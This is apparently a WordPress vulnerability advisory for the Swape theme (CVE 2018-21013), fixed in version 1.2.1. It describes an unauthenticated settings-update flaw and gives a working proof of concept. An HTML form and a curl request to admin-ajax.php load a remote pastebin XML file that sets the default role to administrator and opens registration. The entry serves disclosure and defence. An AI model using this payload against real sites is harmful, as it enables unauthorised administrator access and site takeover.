Swape Theme - Authentication Bypass and Stored XSS



Description
Similar to https://wpvulndb.com/vulnerabilities/8061, but with no authentication

The theme suffers from a privilege escalation vulnerability, any user can trigger this vulnerability due to weak permissions checking. 

An attacker can update options, such as changing user's default role, registration state and others, which may lead to executing commands/code on the server and taking over the website.
Proof of Concept
<form action="http://my-example-site.test/wp-admin/admin-ajax.php" method="post" >
    <input name="action" value="call_upper_load_settings" type="text" />
    <input name="xmlPath" value="https://pastebin.com/raw/VCadYnh7" type="text" />
    <input type="submit" >
</form>

or

curl --request POST \
    --url https://upperinc.com/previews/wp/swape/demo1/wp-admin/admin-ajax.php \
    --header 'content-type: multipart/form-data;' \
    --form action=call_upper_load_settings \
    --form xmlPath=https://pastebin.com/raw/VCadYnh7


and the pastebin content is:

<?xml version="1.0"?>
<root>
  <option>
    <id>default_role</id>
    <value>administrator</value>
  </option>
  <option>
    <id>users_can_register</id>
    <value>1</value>
  </option>
</root>

Affects Theme

fixed in version 1.2.1

References

CVE 2018-21013
URL https://themeforest.net/item/swape-app-showcase-app-store-wordpress-theme/20376082
URL https://upperthemes.com/product/swape-app-showcase-app-store-wordpress-theme/

Classification

Type BYPASS

Miscellaneous

Submitter Aaron
Submitter Twitter BernsteinA
Views 10012
Verified No
WPVDB ID 9024

Timeline

Publicly Published 2018-02-08 (almost 2 years ago)
Added 2018-02-09 (almost 2 years ago)
Last Updated 2019-11-01 (12 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin